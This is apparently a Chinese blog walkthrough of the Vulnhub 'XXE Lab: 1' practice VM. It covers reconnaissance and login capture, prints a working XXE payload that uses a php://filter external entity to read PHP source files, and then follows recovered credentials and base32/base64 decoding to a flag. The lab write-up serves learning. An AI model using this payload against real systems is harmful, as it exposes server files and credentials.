Vulnhub系列靶机---XXE Lab: 1

文章目录

靶机文档:XXE Lab: 1

下载地址:Download (Mirror)

告诉了利用点:http://your-ip/xxe

信息收集

主机发现

端口扫描

目录扫描

访问robots.txt

访问/xxe

随意输入账密,登陆抓包

看到登陆的格式就是XML语言的数据格式

漏洞利用

payload:

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&admin;</name><password>hj</password></root>

将选中base64格式的数据,发送到Decoder模块,去解码

刚才robots.txt文件里还显示有一个admin.php,尝试读取一下

解码发现了用户名和密码

用户名:administhebest

密码解密后是admin@123

还发现了/flagmoout.php

先用得到的账密进行登陆

也跳转到了/flagmeout.php

base64解码后得到一串base32格式的数据

复制代码
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

解码地址:https://www.qqxiuzi.cn/bianma/base.php

解码后得到base64格式的

再进行base64解码,得到一个路径,再次外部实体注入

运行需要php版本较低 ,高版本会报错,导致出不来结果

php5.6在线运行

相关推荐
Bug.ink2 小时前
BUUCTF——WEB(3)
web安全·网络安全·buuctf
一杯咖啡的时间3 小时前
2021年与2025年OWASP Top 10
网络·安全·web安全
墨痕诉清风3 小时前
java漏洞集合工具(Struts2、Fastjson、Weblogic(xml)、Shiro、Log4j、Jboss、SpringCloud)
xml·java·struts·安全·web安全·spring cloud·log4j
Z_renascence3 小时前
web 260-web270
web安全·网络安全
卓豪终端管理4 小时前
构建主动免疫:终端零日漏洞防护新体系
网络·安全·web安全
小阿宁的猫猫5 小时前
XSS的原理、使用、防御方法及练习题
web安全·网络攻击模型·xss·js
bluechips·zhao5 小时前
中间件及框架漏洞详解(Nginx、Apache、Tomcat、Redis、Zookeeper、RabbitMQ、Kafka等)
nginx·web安全·网络安全·中间件·apache·网络攻击模型·java-rabbitmq
爱思考的发菜_汽车网络信息安全6 小时前
汽车网络安全:SHA算法详细解析
安全·web安全·汽车
小阿宁的猫猫6 小时前
文件上传和解析漏洞的原理、条件、比赛时的各种绕过方法
web安全·网络安全·web
m0_738120729 小时前
应急响应——知攻善防Web-3靶机详细教程
服务器·前端·网络·安全·web安全·php